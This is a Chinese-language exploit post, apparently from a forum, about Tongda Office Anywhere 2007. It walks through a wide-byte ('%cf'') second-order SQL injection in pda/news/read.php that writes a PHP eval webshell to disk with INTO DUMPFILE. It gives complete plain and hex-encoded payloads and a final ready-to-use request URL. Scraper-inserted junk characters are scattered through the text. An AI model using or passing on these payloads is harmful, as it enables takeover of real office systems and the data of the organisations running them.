通达OA2007版本漏洞及getshell

admin

目前测试通达OA2007版本


Office Anywhere 2007 网络智能办公系统

http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
6 o' j( M* d! k* G0 J% L. q

这个时候看了下代码，存在注入的那个变量的语句中第3个字段，在该文件下面被另外个select语句调用了，灵光一闪，大概思路是这样的

( R: [/ u, F5 _. o例如：SELECT * from USER where USER_ID='{$USERNAME}'  
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了

7 ^; J# w  w  q/ Z2 Q" S& `这个时候我们是不是可以组合起来使用哪？

第一条语句开始注入，union select 1,2,3,4,5,6,7,8,9,10...，比如第3个是PROVIDER字段，我们这样
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10

这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了

那么问题来了，单引号可以吗？当然是不可以的，^_^。。。

那么我们用字符串格式带入进行hex编码

# M5 ]9 L' W( G/ o%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
  e2 g; g2 |' s! j) V, S& y
测试ok，获取oa的webshell
: z  E* a. h1 M) i

pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
* B1 Z" J: Q# S9 B% Z% ~/ A( B直接getwebshell